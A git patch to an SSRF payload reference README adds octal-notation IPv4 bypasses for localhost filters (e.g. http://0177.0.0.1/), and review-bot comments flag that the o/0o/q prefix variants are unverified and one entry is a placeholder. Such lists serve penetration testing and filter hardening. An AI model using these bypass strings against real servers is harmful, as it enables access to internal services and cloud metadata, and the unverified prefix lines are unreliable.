From f4053576f41914d46c29d3b5356921163f5c65ae Mon Sep 17 00:00:00 2001 From: clem9669 <18504086+clem9669@users.noreply.github.com> Date: Fri, 6 Aug 2021 15:55:55 +0000 Subject: [PATCH] Update SSRF Adding octal techniques for SSRF. DEFCON video: https://www.youtube.com/watch?v=_o1RPJAe4kU --- Server Side Request Forgery/README.md | 20 +++++++++++++++++++- 1 file changed, 19 insertions(+), 1 deletion(-) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index f9c865d..485ee53 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -12,6 +12,7 @@ * [Bypass localhost with a domain redirection](#bypass-localhost-with-a-domain-redirection) * [Bypass localhost with CIDR](#bypass-localhost-with-cidr) * [Bypass using a decimal IP location](#bypass-using-a-decimal-ip-location) + * [Bypass using octal IP](#bypass-using-octal-ip) * [Bypass using IPv6/IPv4 Address Embedding](#bypass-using-ipv6ipv4-address-embedding) * [Bypass using malformed urls](#bypass-using-malformed-urls) * [Bypass using rare address](#bypass-using-rare-address) 
@@ -136,13 +137,29 @@ http://127.0.0.0 ### Bypass using a decimal IP location ```powershell -http://0177.0.0.1/ http://2130706433/ = http://127.0.0.1 http://3232235521/ = http://192.168.0.1 http://3232235777/ = http://192.168.1.1 http://2852039166/ = http://169.254.169.254 ``` +### Bypass using octal IP + +Implementations differ on how to handle octal format of ipv4. + +```sh +http://0177.0.0.1/ = http://127.0.0.1 +http://o177.0.0.1/ = http://127.0.0.1 +http://0o177.0.0.1/ = http://127.0.0.1 +http://q177.0.0.1/ = http://127.0.0.1 +... +``` + +Ref: +- [DEFCON 29-KellyKaoudis SickCodes-Rotten code, aging standards & pwning IPv4 parsing](https://www.youtube.com/watch?v=_o1RPJAe4kU) +- [AppSecEU15-Server_side_browsing_considered_harmful.pdf](https://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf) + + ### Bypass using IPv6/IPv4 Address Embedding [IPv6/IPv4 Address Embedding](http://www.tcpipguide.com/free/t_IPv6IPv4AddressEmbedding.htm) @@ -797,6 +814,7 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se ## References +- [AppSecEU15-Server_side_browsing_considered_harmful.pdf](https://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf) - [Extracting AWS metadata via SSRF in Google Acquisition - tghawkins - 2017-12-13](https://hawkinsecurity.com/2017/12/13/extracting-aws-metadata-via-ssrf-in-google-acquisition/) - [ESEA Server-Side Request Forgery and Querying AWS Meta Data](http://buer.haus/2016/04/18/esea-server-side-request-forgery-and-querying-aws-meta-data/) by Brett Buerhaus - [SSRF and local file read in video to gif converter](https://hackerone.com/reports/115857)
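Review bot: In the second hunk (the new `### Bypass using octal IP` section), the intro sentence says "Implementations differ on how to handle octal format of ipv4" but the code block then lists `0177`, `o177`, `0o177` and `q177` as if all four were interchangeable spellings of `127.0.0.1`, without saying which resolver or URL library accepts which. Only the leading-`0` form is conventional C-style octal; the `o`, `0o` and `q` prefixes need a per-line note naming the implementation they were verified against (the DEFCON 29 talk is the obvious source), or they should be dropped, otherwise readers will burn time on payloads that their target never parses. The trailing `...` line inside the fence should be replaced with real entries or removed, since a placeholder in a payload list carries no information. Two style points in the same hunk: the block is fenced as ```sh while the adjacent decimal block uses ```powershell, so pick one tag for the whole IP-notation run, and "ipv4" should read "IPv4" to match the rest of the section. Moving `http://0177.0.0.1/` out of the decimal section is the right call, as it was never a decimal address.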
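Review bot: In the third hunk (`## References`), the AppSecEU15 PDF is added here and also in the new section-local "Ref:" list, while the DEFCON 29 talk appears only in the section-local list; either add the talk to `## References` as well or keep references in one place, so the two lists do not drift apart. The two new entries also do not follow the list's existing `[Title - author - date](url)` convention used by the surrounding lines (for example `[Extracting AWS metadata via SSRF in Google Acquisition - tghawkins - 2017-12-13]`): the DEFCON entry is missing spaces around its dashes (`DEFCON 29-KellyKaoudis SickCodes-Rotten code`) and the AppSecEU entry is the raw filename with underscores. Suggest `[Rotten code, aging standards & pwning IPv4 parsing - Kelly Kaoudis, Sick Codes - DEFCON 29](...)` and `[Server-side browsing considered harmful - AppSecEU 2015](...)`.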